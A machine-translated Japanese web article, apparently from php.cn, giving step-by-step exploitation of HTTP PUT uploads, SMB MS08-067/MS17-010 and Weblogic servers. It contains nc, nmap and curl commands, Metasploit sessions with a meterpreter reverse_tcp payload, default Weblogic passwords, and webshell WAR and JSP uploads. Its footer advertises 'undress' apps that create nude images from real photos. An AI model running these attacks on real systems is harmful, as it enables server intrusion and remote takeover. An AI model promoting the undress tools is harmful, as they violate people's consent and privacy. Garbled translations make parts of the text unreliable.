目次
1.3 BurpSuite は PUT メソッドを使用します
2. SMB 脆弱性悪用
3.Weblogic の脆弱性悪用
ホームページ 運用・保守 安全性 Web 脆弱性悪用態勢の分析例

Web 脆弱性悪用態勢の分析例

May 27, 2023 am 08:55 AM
web

1. HTTP PUT メソッドの活用

PUT はファイル管理に使用されるメソッドであり、運用保守担当者が Web サーバーのデフォルト設定を変更しておらず、引き続きサポートされている場合は、これらのメソッドを使用すると、ファイルをサーバー ファイル システムに自由にアップロードできます。

1.1. Netcat は PUT メソッドを使用します

Netcat は、「NC」と呼ばれ、「スイスの **」として知られる非常に有名なネットワーク ツールです。侵入テストではこう言われています。ポート監視、ポートスキャン、リモートファイル転送、リモートシェルなどの複数の機能を実装できます。

Web サービスで PUT メソッドが有効になっていることを確認した後、次のコマンドを入力してファイルをアップロードします:

nc IP PORT

PUT /dav/hack.txt HTTP /1.1

ホスト: IP

Web 脆弱性悪用態勢の分析例

Enter キーを 2 回押して、hacked.txt ファイルが正常に作成され、ステータス コードが 201 であることを確認します。ファイルの作成場所は /dav/ ディレクトリです。

1.2. Nmap は PUT メソッドを使用します

コマンド:

nmap -p port IP -script http-put-script-args http-put . url='/dav/test.php',http-put.file='/root/test.php'

コマンド説明:

-script http-put //httpを選択- put スクリプト。このスクリプトは、http put メソッドを使用したファイルのアップロードをサポートします。

-script-args //スクリプトパラメータ1と2を設定します

http-put.url='/dav/test.php' //パラメータ1をアップロードターゲットファイルパスとして設定します

http-put.file='/root/test.php' //パラメータ 2 をアップロードのローカル ファイル パスに設定します。

Web 脆弱性悪用態勢の分析例

この図では、Nmap スクリプトによるアップロードが成功したことがわかります。

1.3 BurpSuite は PUT メソッドを使用します

毎日の BurpSuite を使用してアップロード ターゲット パスにアクセスしてデータ パケットをキャプチャし、データ パケットのリクエスト メソッドとアップロード パスを変更し、ファイルのコンテンツをリクエスト本文を作成し、パッケージを Web サーバーに送信します。

Web 脆弱性悪用態勢の分析例

# サーバー応答パケットは、ファイルが正常に作成されたことを示しています。

Web 脆弱性悪用態勢の分析例

1.4 CURL は PUT メソッドを使用します

CURL は、URL 構文を使用してコマンド ラインで動作し、指定されたファイル経由でアップロードまたはダウンロードするファイル転送ツールです。データをURL化して表示します。 curl の c はクライアントを意味し、URL は URL を意味します。

PUT メソッドでファイルを作成するコマンドは次のとおりです。

コマンド 1:

curl -i -XPUT -H "Content -Type: text/plain ; charset=utf-8" -d "hack completed" http://192.168.40.4/dav/hack.php

Web 脆弱性悪用態勢の分析例##コマンド説明:

-i/--include //出力時にプロトコルヘッダー情報を含める

-X/--request //PUTコマンドを指定

-H/- -header

-d/--data //HTTP POST メソッドはテキストを書き込みます 作成されました http://192.168.40.4/dav/hack.php

コマンド 2:

curl -i -X PUT -H " Content-Type:application /xml; charset=utf-8″ -d @”F:\1.php” http://192.168.40.4/dav/hack.php

Web 脆弱性悪用態勢の分析例コマンド説明 :

-d @"filename" //ファイルからコンテンツを読み取ります

Web 脆弱性悪用態勢の分析例##1.5 QuickPuT スクリプトは PUT メソッドを使用します

Python コマンド ライン ツールである QuickPut を使用すると、HTTP PUT メソッドを使用してファイルをサーバーにアップロードできます。

アップロード コマンド:

python2 QuickPut.py F:\1.php http://192.168.40.4/dav/hack1.php

コマンド説明:Web 脆弱性悪用態勢の分析例

python QuickPut.py

1.6 MetasploitはPUTメソッドを使用します

Metasploitの補助モジュールauxiliary/scanner /http/http_put は、ファイルのアップロードと削除の操作を実装できます。

コマンド:

http サービスの補助スキャンに http_put モジュールを使用します

show options //モジュール パラメーターを表示しますWeb 脆弱性悪用態勢の分析例

set RHOSTS 192.168.40.4 //ターゲットIPを設定します

set PATH /dav/ //ターゲットパスを設定します

set payload php/meterpreter/reverse_tcp //攻撃ペイロードを設定

set filename msf.php //アップロードファイル名を設定

Web 脆弱性悪用態勢の分析例

set FILEDATAファイル://root/test.php //ローカル ファイルをアップロードするためのデータ パスを設定します

exploit //攻撃を開始します

Web 脆弱性悪用態勢の分析例

返された結果は次のことを示していますファイルは正常にアップロードされました。

2. SMB 脆弱性悪用

情報収集ポート スキャンを実行した後、ホストでポート 139 と 445 が開いていることがわかり、バナーに Microsoft Windows が表示されます。ポート 445 の SMB 脆弱性、より一般的なものには ms17-010、ms08-067 などが含まれます。

脆弱性の検出

コマンド:

namp --script=/usr/share/nmap/scripts/smb- vuln-ms08-067.nse –sTIP

namp --script=/usr/share/nmap/scripts/smb-vuln-ms17-010.nse –sTIP

コマンド説明:

--script=/usr/share/nmap/scripts/smb-vuln-ms08-067.nse //Nmapms08-067 脆弱性スキャン スクリプトを使用します

-sT //TCP スキャンを使用します

出力結果が次の場合:

smb-vuln-ms08-067:

VULNERABLE:

Microsoft Windows システムはリモートに対して脆弱ですコード実行 (MS08-067)

状態: VULNERABLE

ID: CVE: CVE-2008-4250

Microsoft Windows 2000 SP4、XP SP2、および SP3 のサーバー サービス、 Server 2003 SP1 および SP2、Vista Gold、SP1、Server 2008、および 7 Pre-Beta では、リモート攻撃者が、パス正規化中にオーバーフローを引き起こす細工された RPC リクエストを介して任意のコードを実行することができます。

公開日: 2008-10-23

参考資料:

https://technet.microsoft.com/en-us/library/security/ms08-067.aspx

https://cve.mitre. org /cgi-bin/cvename.cgi?name=CVE-2008-4250

は、ms08-067 脆弱性が存在することを示し、ms17-010 は上記と同じです。

脆弱性の悪用

MSF smb 攻撃モジュールを使用して、ms08-067 および ms17-010 の脆弱性を悪用します。

msf>exploit/windows/smb/ms08_067_netapiを使用します

msfexploit(ms08_067_netapi)>RHOST IPを設定します

msfexploit(ms08_067_netapi)>exploit

[*]ローカル リスニング IP ポート

でリバース TCP ハンドラーを開始しました。ターゲット IP: 445

を自動的に検出しています。[*]ターゲット IP: 445- フィンガープリント: Windows 2000 - Service Pack 0 ~ 4 - lang:English

[*]ターゲット IP:445- 選択されたターゲット: Windows 2000 Universal

[*]ターゲット IP:445- 脆弱性をトリガーしようとしています...

[*]ステージ (957487 バイト) をターゲット IP に送信中です。

[*]Meterpreter セッション 2 が開きました (IP ポートの監視 -> ターゲット ポート バウンス)

meterpreter>

ms17-010 エクスプロイトは上記と同じです。

3.Weblogic の脆弱性悪用

ペネトレーション テストでは、Weblogic Server のアプリケーション サーバーに遭遇することがよくありますが、Weblogic Server を見た後、Weblogic Server にはバックグラウンド管理があるのではないかと考えられます。このバージョンには、弱いパスワード、JAVA 逆シリアル化の脆弱性、任意のファイルのアップロードの脆弱性、およびその他の多くの CVE の脆弱性があります。 Weblogic のさまざまな脆弱性を悪用する方法を共有しましょう。

Web 脆弱性悪用態勢の分析例3.1 バックエンド ログインの弱いパスワード

共通の Weblogic Server ログインの弱いパスワード:

weblogic/weblogic

weblogic/weblogic1

weblogic/weblogic10

weblogic/weblogic123

これが存在する場合は、アプリケーション サーバー管理バックグラウンドにログインし、webshel​​lwar パッケージをアップロードできます。 。

Web 脆弱性悪用態勢の分析例

#アップロード後にアプリケーション サーバーに war パッケージをデプロイします

Web 脆弱性悪用態勢の分析例

Web 脆弱性悪用態勢の分析例

Web 脆弱性悪用態勢の分析例戦争パッケージのアップロードと展開が正常に完了したら、マレーシアを訪れることができます。

3.2 JAVAデシリアライゼーションの脆弱性

#CVE の脆弱性スクリプトを使用して直接検出でき、脆弱性コードに基づいてエクスプロイト スクリプトを見つけることができます。

Weblogic 脆弱性検出スクリプトは非常に強力で、さまざまな CVE、管理バックグラウンド パス、SSRF、脆弱なパスワードを検出でき、後の拡張もサポートします。

Web 脆弱性悪用態勢の分析例

Java 逆シリアル化脆弱性悪用ツールを使用して、直接検出して悪用することもできます。脆弱性ツールは、脆弱性検出、コマンド実行、ファイルアップロード、一括検査機能を提供します。

Web 脆弱性悪用態勢の分析例

3.3 Weblogic 任意のファイル アップロードの脆弱性

Weblogic を爆破して情報を返します。

Web 脆弱性悪用態勢の分析例

ログイン パスワード、サービス名、ランダム文字ディレクトリを取得し、POC を構築してアップロードし、テスト ファイルをアップロードします。

/bea_wls_deployment_internal/DeploymentService パスの下に次のデータを渡します。

Web 脆弱性悪用態勢の分析例

サーバーは、アップロードの成功とファイルの絶対パスを返します。

Web 脆弱性悪用態勢の分析例

#このアップロードされたファイル パスにアクセスした後、アップロードされたファイルの内容を表示します

http://IP/bea_wls_deployment_internal/shell.jsp

Web 脆弱性悪用態勢の分析例

以上がWeb 脆弱性悪用態勢の分析例の詳細内容です。詳細については、PHP 中国語 Web サイトの他の関連記事を参照してください。

このウェブサイトの声明
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。

ホットAIツール

Undresser.AI Undress

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

Undress AI Tool

脱衣画像を無料で

Clothoff.io

Clothoff.io

AI衣類リムーバー

AI Hentai Generator

AI Hentai Generator

AIヘンタイを無料で生成します。

ホットツール

メモ帳++7.3.1

メモ帳++7.3.1

使いやすく無料のコードエディター

SublimeText3 中国語版

SublimeText3 中国語版

中国語版、とても使いやすい

ゼンドスタジオ 13.0.1

ゼンドスタジオ 13.0.1

強力な PHP 統合開発環境

ドリームウィーバー CS6

ドリームウィーバー CS6

ビジュアル Web 開発ツール

SublimeText3 Mac版

SublimeText3 Mac版

神レベルのコード編集ソフト(SublimeText3)

Python+Flaskを使ってWebページのログのリアルタイム更新・表示を実現する方法 Python+Flaskを使ってWebページのログのリアルタイム更新・表示を実現する方法 May 17, 2023 am 11:07 AM

1. module を使用したファイルへのログ出力:logging はカスタム レベルのログを生成し、指定したパスにログを出力できます ログ レベル: debug (デバッグ ログ) = 5) {clearTimeout (time) // すべての結果が取得された場合 10連続した時間が空です スケジュールされたタスクのログをクリアします}return}if(data.log_type==2){//新しいログが取得された場合 for(i=0;i

Nginx Webサーバーキャディの使用方法 Nginx Webサーバーキャディの使用方法 May 30, 2023 pm 12:19 PM

Caddy の概要 Caddy は強力で拡張性の高い Web サーバーであり、現在 Github 上に 38,000 以上のスターが付いています。 Caddy は Go 言語で書かれており、静的リソースのホスティングとリバース プロキシに使用できます。 Caddy には以下の主な特徴があります: Nginx の複雑な構成と比較して、元の Caddyfile 構成は非常にシンプルです; 提供する AdminAPI を通じて構成を動的に変更できます; デフォルトで自動 HTTPS 構成をサポートし、自動的に適用して構成できますHTTPS 証明書; 数万のサイトのデータに拡張可能; 追加の依存関係なしでどこでも実行可能; Go 言語で記述されているため、メモリの安全性がより保証されます。まずはCentOに直接インストールします

ウェブ上の顔面ブロック攻撃に対するリアルタイム保護 (機械学習に基づく) ウェブ上の顔面ブロック攻撃に対するリアルタイム保護 (機械学習に基づく) Jun 10, 2023 pm 01:03 PM

顔面遮蔽弾幕とは、映像内の人物を遮ることなく大量の弾幕が浮遊し、人物の背後から浮遊しているように見せることです。機械学習は数年前から普及していますが、これらの機能がブラウザでも実行できることは多くの人に知られていません。この記事では、ビデオ連発における実際的な最適化プロセスを紹介します。記事の最後に、適用可能なシナリオをいくつか示します。このソリューションを開くことを望んでいます。いくつかのアイデアがあります。 mediapipeDemo (https://google.github.io/mediapipe/) は、顔ブロック弾幕のオンデマンドアップアップロードの主流の実装原理を示していますサーバーのバックグラウンド計算により、ビデオ画面内のポートレート領域を抽出し、SVG ストレージに変換しますクライアントがビデオを再生している間、サーバーから SVG をダウンロードし、弾幕、ポートレートと組み合わせる

Java API開発におけるWebサーバー処理にJetty7を使用する Java API開発におけるWebサーバー処理にJetty7を使用する Jun 18, 2023 am 10:42 AM

JavaAPI 開発における Web サーバー処理に Jetty7 を使用する インターネットの発展に伴い、Web サーバーはアプリケーション開発の中核部分となり、多くの企業でも注目を集めています。増大するビジネス ニーズを満たすために、多くの開発者が Web サーバー開発に Jetty の使用を選択しており、その柔軟性と拡張性は広く認識されています。この記事では、JavaAPI 開発における Jetty7 の使用方法を紹介します。

Golang を使用して Web アプリケーションのフォーム検証を実装する方法 Golang を使用して Web アプリケーションのフォーム検証を実装する方法 Jun 24, 2023 am 09:08 AM

フォーム検証は Web アプリケーション開発において非常に重要なリンクであり、フォーム データを送信する前にデータの有効性をチェックして、アプリケーションのセキュリティ脆弱性やデータ エラーを回避できます。 Web アプリケーションのフォーム検証は、Golang を使用すると簡単に実装できます。この記事では、Golang を使用して Web アプリケーションのフォーム検証を実装する方法を紹介します。 1. フォーム検証の基本要素 フォーム検証の実装方法を紹介する前に、フォーム検証の基本要素が何であるかを知る必要があります。フォーム要素: フォーム要素は

FRPS サーバーと Web がポート 80 を共有するように nginx を設定する方法 FRPS サーバーと Web がポート 80 を共有するように nginx を設定する方法 Jun 03, 2023 am 08:19 AM

まず、frpって何?という疑問があると思います。簡単に言うと、frp はイントラネット侵入ツールであり、クライアントを設定すると、サーバー経由でイントラネットにアクセスできるようになります。現在、私のサーバーは Web サイトとして nginx を使用しており、ポート 80 が 1 つだけあります。では、FRP サーバーもポート 80 を使用したい場合はどうすればよいでしょうか?クエリ後、nginx のリバース プロキシを使用してこれを実現できます。追加: frps はサーバー、frpc はクライアントです。ステップ 1: サーバーの nginx.conf 構成ファイルを変更し、次のパラメータを nginx.conf の http{} に追加します。server{listen80

コックピット Web UI から管理アクセスを有効にする方法 コックピット Web UI から管理アクセスを有効にする方法 Mar 20, 2024 pm 06:56 PM

Cockpit は、Linux サーバー用の Web ベースのグラフィカル インターフェイスです。これは主に、初心者/熟練ユーザーにとって Linux サーバーの管理を容易にすることを目的としています。この記事では、Cockpit アクセス モードと、CockpitWebUI から Cockpit への管理アクセスを切り替える方法について説明します。コンテンツ トピック: コックピット エントリ モード 現在のコックピット アクセス モードの確認 CockpitWebUI からコックピットへの管理アクセスを有効にする CockpitWebUI からコックピットへの管理アクセスを無効にする まとめ コックピット エントリ モード コックピットには 2 つのアクセス モードがあります。 制限付きアクセス: これは、コックピット アクセス モードのデフォルトです。このアクセス モードでは、コックピットから Web ユーザーにアクセスできません。

ウェブ標準とは何ですか? ウェブ標準とは何ですか? Oct 18, 2023 pm 05:24 PM

Web 標準は、W3C およびその他の関連組織によって策定された一連の仕様とガイドラインです。HTML、CSS、JavaScript、DOM、Web アクセシビリティおよびパフォーマンスの最適化の標準化が含まれます。これらの標準に従うことで、ページの互換性を向上させることができます。 、メンテナンス性とパフォーマンス。 Web 標準の目標は、Web コンテンツをさまざまなプラットフォーム、ブラウザー、デバイス上で一貫して表示および操作できるようにして、より優れたユーザー エクスペリエンスと開発効率を提供することです。

See all articles